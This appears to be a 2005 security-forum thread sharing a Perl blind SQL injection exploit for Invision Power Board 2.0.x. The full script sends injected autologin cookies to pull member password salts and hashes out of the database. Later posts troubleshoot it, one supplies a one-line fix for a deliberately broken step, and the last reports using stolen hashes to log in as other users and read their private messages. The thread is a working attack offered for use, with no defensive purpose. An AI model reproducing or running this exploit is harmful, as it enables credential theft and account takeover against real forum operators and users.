|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Invision Power Board SQL injection exploit by Coyl. CiaNeeD |
|
Posted: Sun Jul 24, 2005 6:54 pm |
|
|
Narsil |
Regular user |
|
|
Joined: Jul 20, 2005 |
Posts: 5 |
|
|
|
|
|
|
|
Quote: | #!/usr/bin/perl
## Invision Power Board SQL injection exploit by Coyl. CiaNeeD team.
## for stealing converge_pass_salt value from ipb database
## on some ipb forums it steals the legacy_password which is the first md5
## hash of the target password.
## vulnerable forum versions : 2.* (<2.0.4)
## tested on version 2.0.2
## * work on mysql 4.0, 4.1 versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## coded by Coyl
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## /ipb.pl 127.0.0.1 /fo/ 1
## [~] SERVER : 127.0.0.1
## [~] PATH : /fo/
## [~] MEMBER ID : 1
## [~] VALUE TO STEAL :
## [~] SEARCHING THE EASIEST WAY... [ FAILED ]
## [~] SEARCHING THE SALT [\5][ DONE ]
##
## SALT : UoU1o
##
## [~] SEARCHING THE PASS HASH [/32][ DONE ]
##
## PASS HASH : 1ab2bc1f32f231f234313444233d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 3) { &usage; }
$enum=0;
$cookie = 1;
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$prefix = ($ARGV[3])?($ARGV[3]):("ibf_");
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] VALUE TO STEAL : \r\n";
print "[~] SEARCHING THE EASIEST WAY... [|0]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$flag=0;
$field=1;
LOOP: while(1)
{
$pass = ($field)?('converge_pass_hash'):('converge_pass_salt');
if($field) { if(&found(96,123)==0) { &found(47,58)}}
if(!$field&&$flag) { &found(33,126) }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{[ DONE ]
};
if (!$flag) { print "\r\nSIMPLE PASS HASH : "; print $allchar."\r\n";}
else
{
print (($field)?("\r\n PASS HASH : "):("\r\n SALT : "));
print $allchar."\r\n\r\n";
$allchar='';
$enum=0;
$s_num=1;
$field++;
if (!($field==2)){print "[~] SEARCHING THE PASS HASH [|0]"; redo LOOP};
}
}
else
{
if (!$flag)
{
print "$back FAILED ]\r\n";
print "[~] SEARCHING THE SALT [|0]";
$flag=1;
$field=0;
redo LOOP;
}
if ($flag)
{
print "$back FAILED ]\r\n";
}
}
exit();
}
else
{ $allchar .= $char;
$enum++;
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=&crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$non="1%2527+union+select+converge_id%2Cconverge_pass_salt%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+from+".$prefix."members_converge+where+%28converge_id%3D";
$eas="1%2527+OR+%28id%3D";
$pass_hash1 = ($flag)?($non):($eas);
$pass_hash2 = "+AND+ascii%28substring%28";
$pass_hash3 = (($flag)?($pass):("legacy_password")).",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) {
return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if ($enum<10) {$back="\b\b\b";}
else {$back="\b\b\b\b"};
if($status==0){ print "$back\\$enum]"; }
if($status==1){ print "$back-$enum]"; }
if($status==2){ print "$back/$enum]"; }
if($status==3){ print "$back|$enum]"; }
}
sub usage()
{
print q(
Invision Power Board v 2.0.0 - 2.0.4 SQL injection exploit modified
--------------------------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [prefix-optinal]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id]- user id for brute
[prefix] - database prefix \(ibf_ by default\)
e.g. ipb.pl 127.0.0.1 / 1 ipb_
--------------------------------------------------------------------
coded by Coyl. CiaNeeD team.
--------------------------------------------------------------------
greets to 1dt.w0lf RST/GHC , http://rst.void.ru , http://ghc.ru
--------------------------------------------------------------------
);
exit();
} |
Well it is a modification of Invision Power Board SQL injection exploit by RST/GHC posted in this forum, but with some improvements.
But i get this results, someone knows what is it? or the exploit is broken?
Quote: | [root@narsil ~]# perl ipb.pl www.--------.com / 1
[~] SERVER : www.----------.com
[~] PATH : /
[~] MEMBER ID : 1
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [ FAILED ]
[~] SEARCHING THE SALT [\5][ DONE ]
SALT : 6790868881
[~] SEARCHING THE PASS HASH |32][ DONE ]
PASS HASH : 48555556102974852531004853501014999559950985553495555100559950485557 |
|
|
|
|
|
|
|
|
|
Posted: Mon Jul 25, 2005 4:04 am |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
interesting i get the same thing with this...perhaps one of the sploitmasters round these parts will be able to take a look at this =)
/me looks for waraxe/linix/etc |
|
|
|
|
Posted: Sun Aug 14, 2005 2:51 am |
|
|
Aelphaeis_Mangarae |
Beginner |
|
|
Joined: Aug 14, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
Quote: | But i get this results, someone knows what is it? or the exploit is broken?
Quote:
[root@narsil ~]# perl ipb.pl www.--------.com / 1
[~] SERVER : www.----------.com
[~] PATH : /
[~] MEMBER ID : 1
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [ FAILED ]
[~] SEARCHING THE SALT [\5][ DONE ]
SALT : 6790868881
[~] SEARCHING THE PASS HASH |32][ DONE ]
PASS HASH : 48555556102974852531004853501014999559950985553495555100559950485557
|
I get the same thing...anyone know what is up with that? |
|
|
|
|
Posted: Sat Aug 20, 2005 1:22 pm |
|
|
Nordik |
Regular user |
|
|
Joined: Aug 20, 2005 |
Posts: 6 |
|
|
|
|
|
|
|
u forget prefix "ipb_" after command line, lok at the example |
|
|
|
|
Posted: Tue Aug 23, 2005 12:23 pm |
|
|
Aelphaeis_Mangarae |
Beginner |
|
|
Joined: Aug 14, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
Nordik I am unsure what you are trying to say..
You mean I put like
exploit.pl host.com /folder/ 1 ipb_ ?
Would appreciate your help. |
|
|
|
|
Posted: Tue Aug 23, 2005 5:30 pm |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
That doesnt work seeing as ibf_ is the default and you dont have to put that. just look at the code.
There is somthing wrong tho and I cant figure it out. Wish i could tho.. |
|
|
|
|
Posted: Wed Aug 24, 2005 8:04 pm |
|
|
Colton |
Regular user |
|
|
Joined: Aug 23, 2005 |
Posts: 5 |
|
|
|
|
|
|
|
Is this for 2.0.4 or earlier?
I tried it on a 2.0.4 board and it failed both ways. |
|
|
|
|
Posted: Thu Aug 25, 2005 12:25 am |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
vulnerable forum versions : 2.* (<2.0.4)
so 2.0.0 2.0.1 2.0.2 2.0.3 otherwise it would be (<=2.0.4)
least thats how i read it. I have spent a good bit of time working on this sploit and its just flawed. I lack the skills needed to fix it . Still wishing somone will fix this bad boy and share it tho. |
|
|
|
|
Posted: Fri Aug 26, 2005 5:01 pm |
|
|
Nordik |
Regular user |
|
|
Joined: Aug 20, 2005 |
Posts: 6 |
|
|
|
|
|
|
|
|
Last edited by Nordik on Wed Feb 18, 2009 10:13 pm; edited 1 time in total |
|
|
|
|
error |
|
Posted: Sun Sep 18, 2005 2:39 pm |
|
|
nhtu |
Beginner |
|
|
Joined: Jan 13, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
Code: | C:\>perl ipb.pl xx.xx.xx.xx / 1 ipb_
[~] SERVER : xx.xx.xx.xx
[~] PATH : /
[~] MEMBER ID : 1
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [-0]Can't use an undefined value as a symbol reference at ipb.pl line 154. |
why? ?[/code] |
|
|
|
|
Posted: Mon Sep 19, 2005 2:38 pm |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
Because the exploit is broken and doesnt work. |
|
|
|
|
Posted: Tue Sep 20, 2005 1:13 pm |
|
|
Nordik |
Regular user |
|
|
Joined: Aug 20, 2005 |
Posts: 6 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Fri Dec 30, 2005 9:57 pm |
|
|
paranoid |
Beginner |
|
|
Joined: Dec 30, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
To get this exploit working
Code: |
else
{ $allchar .= $char;
$enum++;
}
|
Replace the above code with
Code: | else
{ $allchar .= chr($char);
$enum++;
}
|
I've been having problems with it on some of my sites, and on others it works fine, so for a while I assumed it was broken, but after playing with it a bit more, I saw that the problems everyone here was having was because part of the script is intentionally broken... anyways, there's where to patch it, enjoy.
[/code] |
|
|
|
|
Posted: Thu Jan 05, 2006 6:14 pm |
|
|
robin1200 |
Regular user |
|
|
Joined: Sep 13, 2005 |
Posts: 19 |
|
|
|
|
|
|
|
Hey..
I have been able to get any hash using this exploit, then log in with any user changing the cookie with firefox, problem is when I log in as Admin it quickly sends me back to the index with an error message" YOU ARE NOT AUTHORIZED ENTER THIS SITE", however, I am able to see PM's .
any ideas? |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|